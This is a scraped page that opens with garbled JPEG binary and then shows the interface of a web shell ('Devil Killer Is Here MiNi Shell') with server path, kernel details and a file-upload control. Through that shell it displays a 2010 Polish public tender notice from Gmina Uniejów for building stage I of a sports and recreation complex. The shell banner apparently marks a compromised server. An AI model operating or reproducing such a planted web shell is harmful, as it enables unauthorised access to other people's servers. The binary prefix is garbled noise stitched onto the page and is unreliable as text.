JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101124/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101124/335235-N-2010.html

<p class="kh_header"><b>Uniejów: Budowa kompleksu rekreacyjno - sportowego w Uniejowie - etap I</b><br>
<b>Numer ogłoszenia: 335235 - 2010; data zamieszczenia: 24.11.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Uniejów , ul. Błogosławionego Bogumiła 13, 99-210 Uniejów, woj. łódzkie, tel. 063 2888192, faks 063 2888192.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.uniejow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa kompleksu rekreacyjno - sportowego w Uniejowie - etap I.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robót budowlanych w ramach zadania inwestycyjnego pn.: Budowa kompleksu rekreacyjno - sportowego w Uniejowie - etap I
Zakres I etapu budowy kompleksu obejmuje:
a) wykonanie budynku 1A (stanowiącego zaplecze szatniowe dla zawodników, sztabu sędziowskiego, mieszczącego pomieszczenia kontroli antydopingowej, taras widokowy, salę konferencyjną, magazyny sprzętu sportowego, pomieszczenia gospodarcze) o powierzchni zabudowy 1576 m2, kubaturze 13442 m3 wraz z instalacjami wewnętrznymi i zewnętrznymi; 
b) wykonanie budynku 2 (mieszczącego sanitariaty ogólnodostępne i pomieszczenia techniczne) o powierzchni zabudowy 124 m2 wraz z instalacjami wewnętrznymi i zewnętrznymi;
c) budowę boiska do piłki nożnej o nawierzchni z trawy syntetycznej (oznaczonego w dokumentacji projektowej jako B) z systemem nawodnienia, odwodnienia i oświetlenia o powierzchni całkowitej 9600m2 ( 80x120) o wymiarach płyty boiska 68 x 105 m;
d) budowę boiska do piłki nożnej o nawierzchni z trawy naturalnej z rolki (oznaczonego w dokumentacji projektowej jako A) z systemem nawodnienia, odwodnienia, oświetlenia i ogrzewania o powierzchni całkowitej 9600m2 ( 80x120) o wymiarach płyty boiska 68 x 105 m; 
e) budowa infrastruktury technicznej podziemnej i naziemnej - sieć wodociągowa, kanalizacja sanitarna i deszczowa, sieć elektroenergetyczna, oświetlenie terenu i boisk, instalacja odgromowa , sieć teletechniczna, sieć geotermalna/ ciepłownicza w zakresie dla I etapu;
f) zagospodarowaniem terenu - w zakresie etapu I - chodniki wokół boiska B, A, oraz budynków 1 A i 2, ciągi pieszo jezdne wraz z włączeniem do drogi, ogrodzenie terenu i ogrodzenia wewnętrzne; 
g) budowę trybuny T1 na 500 miejsc i T2 na 212 miejsc; 
h) wykonanie ciągu pieszo-jezdnego długości 450 m, szerokości 9,5 m  z kostki betonowej, wraz z włączeniem jej w drogę gminną Nr 111152E Spycimierz - Zieleń oraz włączeniem w drogę dojazdową w obrębie wału przeciwpowodziowego wraz z wykonaniem  23 wpustów deszczowych ulicznych typowych O 500 z osadnikiem i syfonem oraz przykanalikami z rur PVC o łącznej długości 140m; 
i) wykonanie utwardzenia terenu na powierzchni 2000 m2 (działka Nr 2146/17) tłuczniem grubości warstwy po zagęszczeniu 20 cm; 
j) roczny bezpłatny serwis boisk piłkarskich zgodnie z zaleceniami producenta murawy (w tym ewentualne uzupełnianie wypełnienia do wysokości zgodnej z zawartą w karcie technicznej), dodatkowo należy przeszkolić pracownika Zamawiającego w zakresie pielęgnacji boisk
k) zakup i dostawa fabrycznie nowego sprzętu niezbędnego do pielęgnacji boisk zgodnie z wytycznymi dotyczącymi sposobu serwisowania boisk. Kombajn do pielęgnacji boiska z nawierzchnią z trawy sztucznej (np. kombajn typu SMG Sport Champ z przystawkami) powinien zapewnić możliwość przeprowadzenia takich prac jak: oczyszczenie mechaniczne nawierzchni z zanieczyszczeń stałych, szczotkowanie twarde w celu podniesienia włókien, spulchnienie górnej warstwy wypełnienia, czyszczenie wypełnienia z granulatu gumowego, wyrównanie poziomu wypełnienia z ewentualnym uzupełnieniem, końcowe szczotkowanie miękkie, odśnieżanie. Dla boiska o nawierzchni z trawy naturalnej należy dostarczyć: ciągnik kompaktowy, urządzenie do głębokiej aeracji, urządzenie piaskujące i do rozrzucania granulatu, urządzenie wielofunkcyjne do nacinania korzeni i dosiewu perforacyjnego, kosiarka wrzecionowa, kosiarka samojezdna, szczotka z wysięgnikiem, wertykulator, odśnieżarka, przyczepa, rozsiewacz, opryskiwacz, wózek do malowania linii, wycinarka do darni, wycinarka do darni spalinowa, zamiatarka do boisk trawiastych i terenów zielonych, urządzenie do czyszczenia piasku boiskowego - zgodnie z zestawieniem urządzeń do pielęgnacji. 
l) zakup, dostawa i montaż fabrycznie nowych 2 tablic wyników o wymiarach min. 300 x 200 cm; tablice muszą zawierać pola do wyświetlania: czasu meczu (w przerwach czasu rzeczywistego), części meczu, ilości zdobytych bramek (pola dwucyfrowe), nazw zespołów i reklam sponsorów; sekcje z cyframi muszą być zaopatrzone w ochronę przeciwsłoneczną, wynik i czas gry wyświetlany na cyfrach wielkości min. 30 cm, kąt świecenia min. 120 stopni; tablice muszą zapewniać całoroczne użytkowanie, być odporne na uderzenia piłką; widoczność tablicy min. 100 m. 
Szczegółowy opis przedmiotu zamówienia zawarty jest w branżowej dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót budowlanych.  
W/w zakres robót należy wykonać zgodnie z warunkami Specyfikacji Istotnych Warunków Zamówienia (SIWZ).
Uwaga: 
Jeżeli w SIWZ, dokumentacji projektowej oraz specyfikacji technicznej wykonania i odbioru robót przy opisie przedmiotu zamówienia wskazana została nazwa producenta, znak towarowy, patent lub pochodzenie w stosunku do określonych materiałów, urządzeń, itp. Zamawiający wymaga, aby traktować takie wskazanie jako przykładowe i dopuszcza zastosowanie przy realizacji zamówienia materiałów, urządzeń, itp. równoważnych o parametrach nie gorszych niż wskazane.
Jeżeli Wykonawca składający ofertę zaoferuje rozwiązania równoważne, to na Wykonawcy spoczywa obowiązek wskazania równoważności poprzez złożenie w ofercie odpowiednich dokumentów potwierdzających tę równoważność.
W przypadku nawierzchni boiska z  trawy syntetycznej Zamawiający uzna za równoważne użycie materiałów posiadających następujące parametry:
Wysokość całkowita: 47mm - 60mm
Kolor włókien: zieleń w jednym lub dwóch odcieniach
Włókno: polietylen lub poliolefin, monofil, 
Gęstość splotów  minimum: 10.000m2 
Wypełnienie: piasek kwarcowy, granulat gumowy lub termoplast
Gęstość włókien: minimum 150.000m2
Ciężar włókna minimum 15000 DTEX  

Po wybudowaniu boiska z nawierzchnią z trawy syntetycznej wykonawca zobowiązany jest na swój koszt zlecić wykonanie certyfikacji boiska i uzyskać certyfikat min. FIFA 1 STAR. Certyfikat należy uzyskać przed podpisaniem protokołu odbioru końcowego.
W ramach realizacji I etapu należy wykonać wszelkie prace (w tym rozprowadzenie sieci zewnętrznych i wewnętrznych) niezbędne aby umożliwić wykonanie kolejnych etapów inwestycji, bez degradacji elementów już wykonanych.  
Planowana inwestycja zlokalizowana jest w Uniejowie, na obszarze Natura 2000. 
Szczegółowy opis przedmiotu zamówienia zawarty jest w przedmiarach robót i kosztorysach nakładczych robót oraz w specyfikacji technicznej wykonania i odbioru robót budowlanych, a także w wyciągu z dokumentacji technicznej w wersji papierowej i w pełnej dokumentacji technicznej w wersji elektronicznej, załączonych do SIWZ.
Zaleca się Oferentom szczegółowe zapoznanie się z treścią Specyfikacji Istotnych Warunków Zamówienia, zdobycie wszelkich informacji niezbędnych do prawidłowego przygotowania oferty oraz sprawdzenie i zweryfikowanie dokumentacji oraz niezwłocznego poinformowania Zamawiającego o ewentualnych błędach i przeoczeniach
Oznaczenie według Wspólnego Słownika Zamówień (CPV)
Główny przedmiot:
45.00.00.00-7  Roboty budowlane
Przedmiot dodatkowy:
45.11.12.00-0 Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne; 45.26.23.00-4 Betonowanie;45.26.23.10-7 Zbrojenie; 45.26.25.00-6 Roboty murarskie i murowe; 45.22.31.00-7 Montaż konstrukcji metalowych; 45.26.12.10-9 Wykonywanie pokryć dachowych; 45.32.00.00-6 Roboty izolacyjne; 45.41.00.00-4 Tynkowanie; 45.42.10.00-4 Roboty w zakresie stolarki budowlanej;45.43.21.00-5 Kładzenie i wykonywanie podłóg; 45.43.10.00-7 Kładzenie płytek; 45.42.11.60-3 Instalowanie wyrobów metalowych; 45.44.21.00-8 Roboty malarskie; 45.45.00.00-6 Roboty budowlane wykończeniowe, pozostałe; 45.31.31.00-5 Instalowanie wind; 45.23.32.00-1 Roboty w zakresie różnych nawierzchni; 45.34.00.00-2 Instalowanie ogrodzeń, płotów i sprzętu ochronnego; 45.33.11.00-7 Instalowanie centralnego ogrzewania; 45.31.61.00-6 Instalowanie urządzeń oświetlenia zewnętrznego; 45.23.32.20-7 Roboty w zakresie nawierzchni dróg ; 45.23.23.00-5 Roboty budowlane i pomocnicze w zakresie linii telefonicznych i ciągów komunikacyjnych; 45.31.43.00-4 Instalowanie infrastruktury okablowania; 45.31.41.00-2 Instalowanie central telefonicznych; 45.31.20.00-7 Instalowanie systemów alarmowych i anten; 45.31.40.00-1 Instalowanie urządzeń telekomunikacyjnych; 45.31.21.00-8 Instalowanie przeciwpożarowych systemów alarmowych; 45212200-8 Roboty budowlane w zakresie budowy obiektów sportowych; 45.30.00.00-0 Roboty instalacyjne w budynkach; 45.33.00.00-9 Roboty instalacyjne wodno - kanalizacyjne i sanitarne
45.33.10.00-6 Instalowanie urządzeń grzewczych, wentylacyjnych i klimatyzacyjnych; 45.33.22.00-5 Roboty instalacyjne hydrauliczne; 45.33.23.00-6 Roboty instalacyjne kanalizacyjne; 45.23.13.00-8 Roboty budowlane w zakresie budowy wodociągów i rurociągów odprowadzania ścieków; 45.23.11.00-6 Ogólne roboty budowlane związane z budową rurociągów; 45.33.11.10-0 Instalowanie kotów; 45.33.12.00-8 Instalowanie urządzeń wentylacyjnych i klimatyzacyjnych
16.70.00.00-2 Ciągniki; 34.39.00.00-7 Akcesoria do ciągników; 16.31.10.00-8 Kosiarki do trawników; 16.31.11.00-9 Kosiarki do pielęgnacji trawników, zieleni parkowej lub terenów sportowych; 16.50.00.00-0 Przyczepy lub naczepy samo załadowcze i wyładowcze do celów rolniczych; 43.31.30.00-0 Pługi odśnieżające lemieszowe i wirnikowe.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.12.00-0, 45.26.23.00-4, 45.26.23.10-7, 45.26.25.00-6, 45.22.31.00-7, 45.32.00.00-6, 45.41.00.00-4, 45.42.10.00-4, 45.43.21.00-5, 45.43.10.00-7, 45.42.11.60-3, 45.44.21.00-8, 45.45.00.00-6, 45.31.31.00-5, 45.23.32.00-1, 45.34.00.00-2, 45.33.11.00-7, 45.31.61.00-6, 45.23.32.20-7, 45.23.23.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Wadium należy wnieść w wysokości 700 000,00 zł. 
2. Wadium może być wnoszone w pieniądzu, w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym oraz w gwarancjach bankowych, gwarancjach ubezpieczeniowych lub poręczeniach udzielanych przez podmioty, o których mowa w art. 6 ust. 3 pkt 4 lit. b ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2002 r. Nr 109, poz. 1158 z późn. zm.)
3. Wadium wnoszone w pieniądzu należy wpłacić wyłącznie przelewem na rachunek bankowy Zamawiającego: 73855700090200013020020023 w takim terminie, aby najpóźniej przed upływem terminu składania ofert - określonym w pkt. XIV SIWZ - środki finansowe z tytułu wadium znajdowały się na wskazanym wyżej rachunku Zamawiającego. Zamawiający stwierdzi wniesienie wadium na podstawie informacji banku prowadzącego w/w rachunek.
4. Wadium wniesione w innej formie niż pieniężna należy zdeponować w oryginale w kasie Urzędu Miasta w Uniejowie przed upływem terminu składania ofert.
5. Gwarancja bankowa lub ubezpieczeniowa, stanowiąca formę wniesienia wadium, winna spełniać co najmniej następujące wymogi (pod rygorem wykluczenia wykonawcy):
a) ustalać beneficjenta gwarancji, tj. Gminę Uniejów
b) określać kwotę gwarantowaną w zł. (ustaloną w SIWZ),
c) określać termin ważności (wynikający z SIWZ),
d) określać przedmiot gwarancji (wynikający z SIWZ),
e) być gwarancją nieodwoływalną, bezwarunkową, płatną na każde żądanie.
Uwaga!  
Z treści gwarancji bankowej lub ubezpieczeniowej powinno wynikać uprawnienie Zamawiającego do zatrzymania wadium jeżeli wystąpią przesłanki opisane w art. 46 ust 4 a i 5 ustawy z dnia 29 stycznia 2004 roku Prawo zamówień publicznych (tekst jednolity: Dz. U. z 2010 r. Nr 113, poz. 759 z późn. zmianami), w szczególności uprawnienie Zamawiającego do zatrzymania wadium wraz z odsetkami jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Prawo zamówień publicznych, nie złoży dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy Prawo zamówień publicznych, lub pełnomocnictw.
6. Do wadium wniesionego w formie poręczenia wymagania opisane w pkt 4 stosuje się odpowiednio
7. W przypadku nie wniesienia wadium na warunkach określonych w pkt 1-4 Wykonawca zostanie wykluczony z dalszego postępowania, a złożona przez niego oferta zostanie odrzucona.
8. Zwrot wadium nastąpi na zasadach określonych w art. 46 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (tekst jednolity: Dz. U. z 2010 r. Nr 113, poz. 759 z późn. zmianami). 
Oferent zobowiązany jest podać w ofercie dokładną informację odnośnie zwrotu wadium tj. adres banku, numer konta itp.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadają uprawnienia do występowania w obrocie prawnym i prowadzenia działalności w zakresie objętym niniejszym zamówieniem. Ocena spełnienia przez Wykonawców wymaganych warunków, będzie dokonana na podstawie treści wymaganych oświadczeń lub dokumentów według formuły Spełnia / nie spełnia wymagany warunek</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadają doświadczenie w realizacji robót budowlanych odpowiadających swoim rodzajem i wartością robotom stanowiącym przedmiot zamówienia tj. wykażą realizację, iż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, roboty budowlanej w zakresie odpowiadającym swoim rodzajem i wartością przedmiotowi zamówienia. Za spełnienie niniejszego warunku uznane zostanie wykonanie robót budowlanych polegających na: budowie budynku o kubaturze min. 10 000 m3, pełnowymiarowego boiska do piłki nożnej o nawierzchni z trawy syntetycznej, pełnowymiarowego boiska do piłki nożnej o nawierzchni z trawy naturalnej z rolki, robót drogowych - wykonanie ciągów komunikacyjnych o nawierzchni z kostki betonowej; wykonanie robót instalacyjnych w zakresie sieci wodno - kanalizacyjnych, cieplnych i elektrycznych. 
Ocena spełnienia przez Wykonawców wymaganych warunków, będzie dokonana na podstawie treści wymaganych oświadczeń lub dokumentów według formuły Spełnia / nie spełnia wymagany warunek</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykażą, iż dysponują lub będą dysponować osobami zdolnymi do wykonania zamówienia, posiadającymi wymagane polskim prawem budowlanym uprawnienia danej specjalności do pełnienia samodzielnych funkcji technicznych w budownictwie, tj. - kierownikiem budowy z uprawnieniami w specjalności konstrukcyjno - budowlanej bez ograniczeń; -kierownikiem robót z uprawnieniami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń; -kierownikiem robót z uprawnieniami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń; -kierownikiem robót z uprawnieniami w specjalności drogowej w ograniczonym zakresie; -kierownikiem robót z uprawnieniami w specjalności telekomunikacyjnej w ograniczonym zakresie
Ocena spełnienia przez Wykonawców wymaganych warunków, będzie dokonana na podstawie treści wymaganych oświadczeń lub dokumentów według formuły Spełnia / nie spełnia wymagany warunek</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, a w szczególności:
A) Są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności  gospodarczej - wartość ubezpieczenia powinna wynosić co najmniej 5.000.000,00 zł.
B) Posiadają na wykonanie zamówienia własne środki finansowe lub zdolność kredytową w wysokości nie mniejszej niż 9.000.000,00 zł.
Ocena spełnienia przez Wykonawców wymaganych warunków, będzie dokonana na podstawie treści wymaganych oświadczeń lub dokumentów według formuły Spełnia / nie spełnia wymagany warunek</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

